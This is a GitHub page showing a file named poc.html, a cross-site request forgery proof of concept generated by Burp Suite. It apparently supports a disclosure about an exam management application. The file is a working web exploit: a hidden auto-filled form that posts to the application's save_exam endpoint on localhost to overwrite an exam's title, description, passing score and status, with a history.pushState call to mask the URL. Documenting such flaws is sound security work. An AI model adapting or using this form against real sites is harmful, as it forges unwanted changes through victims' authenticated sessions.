Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
poc/poc.html
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
15 lines (15 sloc)
1.24 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <!-- CSRF PoC - generated by Burp Suite Professional --> | |
| <body> | |
| <script>history.pushState('', '', '/')</script> | |
| <form action="http://localhost/erms/classes/Master.php?f=save_exam" method="POST" enctype="multipart/form-data"> | |
| <input type="hidden" name="id" value="2" /> | |
| <input type="hidden" name="title" value="Sample Exam 102" /> | |
| <input type="hidden" name="category_id" value="2" /> | |
| <input type="hidden" name="description" value="Fusce ut vulputate tortor. Aenean sit amet erat vitae urna lacinia volutpat vel non tellus. Mauris tellus felis, ultrices placerat aliquet ac, sodales tempus dui. Integer eros dui, ultrices vitae dolor ac, placerat pretium orci. Suspendisse tempor magna efficitur condimentum rutrum. Lorem ipsum dolor sit amet, consectetur adipiscing elit." /> | |
| <input type="hidden" name="passing_score" value="21" /> | |
| <input type="hidden" name="status" value="1" /> | |
| <input type="submit" value="Submit request" /> | |
| </form> | |
| </body> | |
| </html> |